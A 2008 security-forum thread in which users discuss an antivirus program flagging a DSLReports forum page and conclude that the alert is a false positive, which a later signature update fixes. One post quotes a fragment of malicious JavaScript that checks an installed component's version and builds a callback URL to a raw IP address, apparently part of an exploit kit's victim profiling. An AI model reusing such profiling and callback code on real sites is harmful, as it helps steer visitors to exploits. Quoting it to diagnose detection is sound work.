Warning from NOD32 on DSLR-security-forum thread

Discussion in 'NOD32 version 2 Forum' started by FanJ, Nov 22, 2008.

Thread Status:
Not open for further replies.
  1. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Posting in this thread at DSLR Security forum:
    http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

     
  2. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    The thread at the DSLR board on which NOD32 gives a warning, is this one:

    hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

    (I have changed http into hxxp)

    That thread is two pages long on my machine and I get the warning on the second page.

    I have already send an IM to Marcos here on the Wilders board.
    I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
    I hope that they will have a look at it after the weekend (please).
     
  3. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Maybe the following two screenshots are too big.

    IMON warning
     

    Attached Files:

  4. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    AMON warning
     

    Attached Files:

  5. ASpace

    ASpace Guest

    Do you suspect that the javascript detection is false positive ?
     
  6. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Hi HiTech_boy,

    Somehow that is indeed what I'm thinking.
    I hardly can believe that there is a malware on the DSLR/BBR security forum.
    The warning I am getting, is making me thinking of an heuristic detection.
    I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
    If I see any warning from NOD32 on a file, of course I would send it in in a password protected ZIP-file; but what to do in this case? That's why I have send Marcos an IM here at Wilders.
     
  7. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

    Code:
    var i,l,v;  
    num = 2;  
    s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';  
    l = testing.isComponentInstalled(s,'ComponentID');  
    v = testing.getComponentVersion(s,'ComponentID');  
    if (l == true) {  
    x = v.split(',');  
    if ( (x[0]!=0) && (x[2]<3810) ) {  
    num = 1;  
         }  
       }  
      
    c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;
    Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags and save the file as test.html or whatever and watch NOD32 to quarantine it.
     
  8. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    said by doktornotor:
    Hi,

    Where has this been debated before?
     
  9. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.
     
  10. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    OK, thanks for checking it !

    Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).
     
  11. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
    Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.
     
  12. ASpace

    ASpace Guest

    Currently with update 3634 , I no longer see any alerts and I can browse the forum
     
  13. doktornotor

    doktornotor Registered Member

    Joined:
    Jul 19, 2008
    Posts:
    2,047
    Yeah, looks good now. :thumb:
     
  14. FanJ

    FanJ Updates Team

    Joined:
    Feb 9, 2002
    Posts:
    3,158
    Yep, it's fixed :thumb:

    Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.